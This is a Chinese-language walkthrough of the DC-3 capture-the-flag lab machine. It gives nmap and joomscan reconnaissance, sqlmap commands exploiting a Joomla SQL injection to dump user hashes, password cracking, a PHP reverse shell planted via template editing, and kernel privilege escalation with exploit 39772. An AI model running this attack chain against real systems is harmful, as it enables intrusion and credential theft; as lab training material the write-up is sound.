环境准备
DC-3靶机链接:百度网盘 请输入提取码
提取码:pz03
虚拟主机网络连接模式:桥接模式
攻击机系统:Kali Linux2021.1
信息收集
1:使用以命令进行主机探测
ar-scan -l
2:对其主机进行详细的扫描发现只开放了80端口
nmap -sC -sV -p 1-65535 192.168.166.132
3:这里使用Joomscan扫描器来进行敏感信息收集
项目地址:https://github.com/OWASP/joomscan
直接用命令:git clone https://github.com/rezasp/joomscan.git
使用命令:joomscan --url http://192.168.166.132
4:发现Joomla版本号与后台管理地址,使用searchsploit查看是否有可以使用的EXP
5:可以看到有一个SQL注入漏洞,并使用以下命令查看详细信息
searchsploit -x php/webapps/42033.txt
漏洞利用
1:根据以上提示可以对其进行SQL注入
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] ‐D joomladb ‐T "#__users" ‐C "username,password" ‐‐dump
2:使用john对其HASH进行破解
3:得出admin账户密码 扫描出来的登录界面
4:登录http://192.168.166.132/administrator/
用户名:admin 密码:snoopy
5:按照图片指示操作
:
6:并通过编辑模板来获取shell,写php-reverse-shell.php木马 (百度即可获得)
权限提升
1: kali开启监听 ,拼接路径触发木马来反弹shell,查了一通,并没 有价值信息。
2:这次查看系统版本,看有没有内核漏洞
cat /etc/*release
3:使用searchsploit搜索主机Ubuntu 16.04 有关提权漏洞
4:找到一个39772.txt ,查看他的位置
5:cat /usr/share/exploitdb/exploits/linux/local/39772.txt 用cat命令查看后,这边提供了操作方法还有利用工具的下载方法(一时感叹kali真屌!!)
6: 把靶机目录切换到/tmp目录下,进行下载39772.zip
7::再次我们使用39772进行提权,用unzip 解压39772.zip , 打开后发现俩个文件
tar -xvf exploit.tar //解压
./compile.sh
./doubleput
按照第五步的截图做就OK ,最后也是轻松拿下!!!